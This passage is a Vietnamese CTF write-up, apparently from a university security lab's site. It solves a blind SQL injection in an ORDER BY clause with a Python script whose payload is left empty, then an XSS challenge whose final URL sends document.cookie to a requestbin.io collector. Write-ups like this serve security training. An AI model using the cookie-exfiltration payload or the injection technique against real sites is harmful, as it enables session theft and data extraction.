những bài có source như thế này thì mình khá thích vì mình có thể biết được mình đang đối mặt với thứ gì và đồng thời biết được mục tiêu của mình biết người biết ta trăm trận trăm thắngnhìn qua một lượtflag ở trong table flag_randomta có 2 querydễ thấy query thứ 2 được truyền thẳng vào mà không có bất kỳ bộ lọc nào.nên ta có thế sqli ở getEmojisquery chỗ mình control được là ở mệnh đề order bymình sẽ khẳng định đây là một bài blindsearch một lúc thì thấy một trang như sauhttps://portswigger.net/support/sql-injection-in-the-query-structurecó cấu trúc rồi làm thôi.đây là script cuối cùng của mình

import requestsurl = "http://188.166.156.37:32565/api/list"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Content-type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0"}flag="CHTB{order_me_this_juicy_info}"flag=""for i in range(20,50):  print(i)  for j in range(32,128):    #print(chr(j))    data = {"order": f" "}    r=requests.post(url, headers=headers, data=data)    a=r.text    if a.startswith('''[{"id":1'''):      flag+=chr(j)      print("flag:"+flag)      print(r.text,data)      break

9. bug report

bài xss này gồm chủ yếu file đó là app.py và bot.pyapp.py làm nhiệm vụ nhận url của mình truyền vào và gọi tới bot.pybehavior của bot như sauđầu tiên set cookie là flag và get tới localhost, sau đó mới get tới url mà mình controlvì đây là một header chromeless nên nó có thể thực thi bất kỳ js nào, nhưng vì cors nên không thể nào lấy được cookie từ trang web trước đó được request, cụ thể ở đây là localhost.stuck một lúc thì mình nhìn lại app.pyđúng là ctf lừa nhau là chủ yếu màta có thể trigger xss ở đâyđến đây thì ez rồi, flag đc set ở cookie local, mà đồng thời ta có thể triger xss ở local => get flag so simplehttp://127.0.0.1:1337/<script>fetch("https://requestbin.io/15qgycy1/"+document.cookie,{mode:'no-cors'})</script>

TIN LIÊN QUAN
Kính gửi Quý Thầy, Cô, Phòng thí nghiệm An toàn thông tin (PTN ATTT) kính mời quý Thầy Cô tham dự Buổi báo cáo học thuật An toàn thông tin - Lần 04 năm 2024 với nội dung cụ thể như sau: Nội dung báo cáo: "Trình tối ưu hoá...
Kính gửi Quý Thầy, Cô, Phòng thí nghiệm An toàn thông tin (PTN ATTT) kính mời quý Thầy Cô tham dự Buổi báo cáo học thuật An toàn thông tin - Lần 03 năm 2024 với nội dung cụ thể như sau: Nội dung báo cáo: "A FEDERATED INCREMENTAL LEARNING...
Kính gửi Quý Thầy, Cô, Phòng thí nghiệm An toàn thông tin (PTN ATTT) kính mời quý Thầy Cô tham dự Buổi báo cáo học thuật An toàn thông tin - Lần 02 năm 2024 với nội dung cụ thể như sau: Nội dung báo cáo: "Improve penetration testing performance...